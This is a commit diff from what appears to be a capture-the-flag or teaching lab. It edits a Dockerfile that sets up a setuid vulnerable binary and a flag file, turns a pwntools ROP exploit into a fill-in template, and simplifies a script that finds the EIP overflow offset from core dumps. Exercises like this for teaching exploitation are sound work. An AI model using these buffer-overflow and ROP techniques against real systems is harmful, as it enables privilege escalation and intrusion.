clean up scripts

nkcyber · Nov 14, 2024 · 1f804e9 · 1f804e9
1 parent 5ab2626
commit 1f804e9
Show file tree

Hide file tree

Showing 3 changed files with 32 additions and 31 deletions.
diff --git a/Dockerfile b/Dockerfile
@@ -24,6 +24,7 @@ RUN chmod 400 flag.txt && \
 	chgrp user attack.py && \
 	ulimit -c unlimited && \
 	# chown 4755 create_table.py && \
+	cp example example-crash && \
 	chmod 4755 example
 
 USER user

diff --git a/attack.py b/attack.py
@@ -1,23 +1,25 @@
 #!/usr/bin/env python3
 
-import sys
 from pwn import *
-from itertools import cycle
 
 elf = ELF("./example")
 # set the base address, to combat PIE
 elf.address = elf.libs['/app/example']
 
-# Now, we can create our attack.
-## --------------
-
+# create a ropchain
 rop = ROP(elf)
-rop.win()
 
+########################################
+
+# This needs to be the function you want to call
+# <https://docs.pwntools.com/en/stable/rop/rop.html#pwnlib.rop.rop.ROP>
+rop.funcname()
 
-offset = 76 # This needs to be the offset for eip
+# This needs to be the offset for eip.
+# Consider using create_table.py to find eip
+offset = ...
 
-## --------------
+########################################
 
 payload = flat({
     offset: rop.chain()

diff --git a/create_table.py b/create_table.py
@@ -2,33 +2,31 @@
 from pwn import *
 from prettytable import PrettyTable
 
-
 def get_corefile_location(executable_name: str, pid: int) -> os.PathLike[str]:
     with open("/proc/sys/kernel/core_pattern") as f:
         core_pattern = f.read()
         assert "%e" and "%p" in core_pattern
         return core_pattern.replace("%e", executable_name).replace("%p", str(pid)).strip()
 
-for i in range(65, 100):
-    print(f"trying {i=}")
-    try:
-        payload = cyclic(i)
-        # Start the vulnerable binary
-        with process(['./example', payload]) as p:
-            p.wait()  # Wait for the program to crash
-
-        # Examine the crash to find the offset
-        core = Coredump(get_corefile_location("example", p.pid))
-
-        table = PrettyTable()
-        table.align = 'l'
-        table.field_names = ["register", "hex value", "decimal value", "cyclic_find"]
-        sorted_registers = dict(sorted(core.registers.items(), key=lambda item: -item[1]))
-        for k,v in sorted_registers.items():
-            table.add_row([k,hex(v), v, cyclic_find(v)])
-
-        print(table)
-    except Exception as e:
-        print(e)
-    input('...')
+BUFFER_SIZE = 64
+# overflow the buffer
+payload = cyclic(BUFFER_SIZE * 2)
+
+# Start the vulnerable binary
+with process(['./example-crash', payload]) as p:
+    p.wait()  # Wait for the program to crash
+
+# Examine the crash to find the offset
+core = Coredump(get_corefile_location("example-crash", p.pid))
+
+table = PrettyTable()
+table.align = 'l' # algin left
+table.field_names = ["register", "hex value", "decimal value", "cyclic_find"]
+
+sorted_registers = dict(sorted(core.registers.items(), key=lambda item: -item[1]))
+# construct table of values
+for k,v in sorted_registers.items():
+    table.add_row([k,hex(v), v, cyclic_find(v)])
+
+print(table)